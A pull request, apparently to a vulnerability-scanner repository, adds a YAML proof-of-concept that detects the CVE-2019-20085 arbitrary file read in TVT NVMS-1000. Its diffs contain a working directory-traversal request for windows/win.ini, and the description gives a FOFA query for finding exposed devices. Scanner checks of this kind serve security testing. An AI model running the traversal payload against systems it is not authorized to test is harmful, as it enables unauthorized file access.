### PR TITLE
TVT NVMS-1000 任意文件读取 CVE-2019-20085

### DIFF
--- a/pocs/tvt-nvms-1000-file-read-cve-2019-20085.yml
+++ b/pocs/tvt-nvms-1000-file-read-cve-2019-20085.yml
@@ -1,0 +1,10 @@
+name: poc-yaml-tvt-nvms-1000-file-read-cve-2019-20085
+rules:
+  - method: GET
+    path: /../../../../../../../../../../../../windows/win.ini
+    expression: |
+      response.status == 200 && response.body.bcontains(b"for 16-bit app support")
+detail:
+  author: fuzz7j(https://github.com/fuzz7j)
+  links:
+    - https://www.exploit-db.com/exploits/47774

--- a/pocs/tvt-nvms-1000-file-read-cve-2019-20085.yml
+++ b/pocs/tvt-nvms-1000-file-read-cve-2019-20085.yml
@@ -6,9 +6,15 @@ rules:
         request:
             cache: true
             method: GET
+            path: /Pages/login.htm
+        expression: response.status == 200 && response.body.bcontains(b"<title>NVMS-1000</title>")
+    r1:
+        request:
+            cache: true
+            method: GET
             path: /../../../../../../../../../../../../windows/win.ini
         expression: response.status == 200 && response.body.bcontains(b"for 16-bit app support")
-expression: r0()
+expression: r0() && r1()
 detail:
     author: fuzz7j(https://github.com/fuzz7j)
     links:

--- a/pocs/tvt-nvms-1000-file-read-cve-2019-20085.yml
+++ b/pocs/tvt-nvms-1000-file-read-cve-2019-20085.yml
@@ -1,10 +1,15 @@
 name: poc-yaml-tvt-nvms-1000-file-read-cve-2019-20085
+manual: true
+transport: http
 rules:
-  - method: GET
-    path: /../../../../../../../../../../../../windows/win.ini
-    expression: |
-      response.status == 200 && response.body.bcontains(b"for 16-bit app support")
+    r0:
+        request:
+            cache: true
+            method: GET
+            path: /../../../../../../../../../../../../windows/win.ini
+        expression: response.status == 200 && response.body.bcontains(b"for 16-bit app support")
+expression: r0()
 detail:
-  author: fuzz7j(https://github.com/fuzz7j)
-  links:
-    - https://www.exploit-db.com/exploits/47774
+    author: fuzz7j(https://github.com/fuzz7j)
+    links:
+        - https://www.exploit-db.com/exploits/47774


### PR DESCRIPTION
## 本 poc 是检测什么漏洞的
TVT NVMS-1000 任意文件读取 CVE-2019-20085
## 测试环境
fofa：app="TVT-NVMS-1000"
## 备注
<img width="565" alt="11" src="https://user-images.githubusercontent.com/87168863/134858947-164ae2c4-5985-404a-8dea-66cd775d38a5.png">
